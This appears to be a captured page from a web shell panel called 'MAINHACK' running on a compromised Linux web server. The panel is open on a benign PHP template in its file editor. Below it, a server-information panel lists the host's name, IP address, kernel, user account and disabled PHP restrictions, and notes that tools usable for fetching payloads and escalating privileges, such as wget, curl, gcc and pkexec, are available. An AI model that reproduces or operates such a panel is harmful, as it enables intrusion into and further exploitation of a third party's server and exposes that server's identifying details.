[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: env_details.html.php
<?php /* List data-table values, i.e: $_SERVER, $_GET, .... */ ?> <div class="details"> <h2 class="details-heading">Environment & details:</h2> <div class="data-table-container" id="data-tables"> <?php foreach ($tables as $label => $data): ?> <div class="data-table" id="sg-<?php echo $tpl->escape($tpl->slug($label)) ?>"> <?php if (!empty($data)): ?> <label><?php echo $tpl->escape($label) ?></label> <table class="data-table"> <thead> <tr> <td class="data-table-k">Key</td> <td class="data-table-v">Value</td> </tr> </thead> <?php foreach ($data as $k => $value): ?> <tr> <td><?php echo $tpl->escape($k) ?></td> <td><?php echo $tpl->dump($value) ?></td> </tr> <?php endforeach ?> </table> <?php else: ?> <label class="empty"><?php echo $tpl->escape($label) ?></label> <span class="empty">empty</span> <?php endif ?> </div> <?php endforeach ?> </div> <?php /* List registered handlers, in order of first to last registered */ ?> <div class="data-table-container" id="handlers"> <label>Registered Handlers</label> <?php foreach ($handlers as $i => $h): ?> <div class="handler <?php echo ($h === $handler) ? 'active' : ''?>"> <?php echo $i ?>. <?php echo $tpl->escape(get_class($h)) ?> </div> <?php endforeach ?> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.55 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002